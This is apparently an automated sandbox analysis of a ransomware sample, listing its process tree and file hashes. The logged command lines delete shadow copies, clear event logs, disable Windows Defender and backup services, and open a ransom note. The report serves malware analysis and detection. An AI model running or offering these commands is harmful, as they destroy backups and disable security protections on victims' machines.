C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
PID:5036
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4616
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1416
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2252
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4992
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4076
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4972
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2748
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:424
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2356
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3576
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:428
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:308
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3588
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:4980
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:4224
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2480
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:4560
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3912
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:4684
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:440
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:4284
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:4764
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:4852
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:364
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3464
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3896
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4652
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4728
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2224
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1168
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3712
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1644
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1815d" start= disabled2⤵
- Launches sc.exe
PID:5076
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:2192
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:4912
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:4632
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:860
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:4148
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:2612
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1815d" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4776
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1116
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2864
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1832
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2628
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4584
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4412
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3952
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2936
-
-
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\K8zJ_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:4056
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"2⤵PID:4064
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:756
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y1⤵PID:308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y1⤵PID:3484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y1⤵PID:1416
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All1⤵
- Deletes Windows Defender Definitions
PID:4452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4868
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4452
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1815d" /y1⤵PID:4680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y1⤵PID:4992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y1⤵PID:2900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y1⤵PID:3596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y1⤵PID:1948
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:2356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y1⤵PID:1068
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f939d786e1fb30d287357d553719cf88
SHA1b5001e66047bb37310e8b9c78fef2d1ef6443e1f
SHA2565f3f1382a950d3c94afafb319c58b2b3731bce694966973685aad6bf9b156cad
SHA5128da927a8e9425e10a29daeb4b93f66484eca789805dd66a29bfee52b59c2a6df9895bc5dfd814eca788ed27b53463cdd4e8983ff2fc04496d5998a4193f3c2a9
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD5c19f0993277f9641182b4256afd5387a
SHA127864a1f3bfa73fb238f0f186f9ab30b9d7b5543
SHA256ab84624a461f697712d83e8efdbd1217e8b5b63ee4abf599832e0d31d97f7e4b
SHA51280731efc18bf6c1085d5650f34179ca096b019bee85b26d6cd737602a76dd564b9387b5b816cf352b8ca51f5cbe008147d446fc4f56329ec9f334785a6db525f
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
769.0MB
MD5fd751525406eea3ca4346787a43ea76c
SHA1bab6bf0619343fa25d8fef638ee1e3029bd6aab9
SHA256da86467a59376358dec033b504c290a89de887733eaf3354c53ba5205a86eb62
SHA5121050c80d4f4cb1450afbf2b010fab92daadc924c31973c1e13c9b0a29d3812e40d190c5a42a8a22c419b7ebae71eaa7e4a732ee1849bc6a7e6fd7af77f2e003a